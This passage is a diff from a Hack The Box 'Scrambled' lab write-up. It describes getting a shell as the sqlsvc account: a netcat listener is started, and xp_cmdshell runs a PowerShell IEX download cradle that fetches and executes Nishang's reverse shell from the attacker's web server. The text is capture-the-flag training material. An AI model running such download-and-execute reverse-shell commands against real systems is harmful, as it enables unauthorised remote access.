MaxJackson13/HackTheBox/Scrambled/Scrambled.md

 --------------------
 Now I'll get a shell on the box as `sqlsvc` so that I can use `SeImpersonatePrivilege`

-To do this I'll run `rlwrap nc -nvlp 8000` to start a netcat listener on port 8000, while hosting Nishang's `Invoke-PowerShellTcp.ps1` reverse shell on a webserver then execute `IEX(New-Object Net.WebClient).downloadString('http://10.10.14.43/Invoke-PowerShellTcp.ps1')` from the MSSQL instance.
+To do this I'll run `rlwrap nc -nvlp 8000` to start a netcat listener on port 8000, while hosting Nishang's `Invoke-PowerShellTcp.ps1` reverse shell on a webserver then execute `xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.43/Invoke-PowerShellTcp.ps1')` from the MSSQL instance.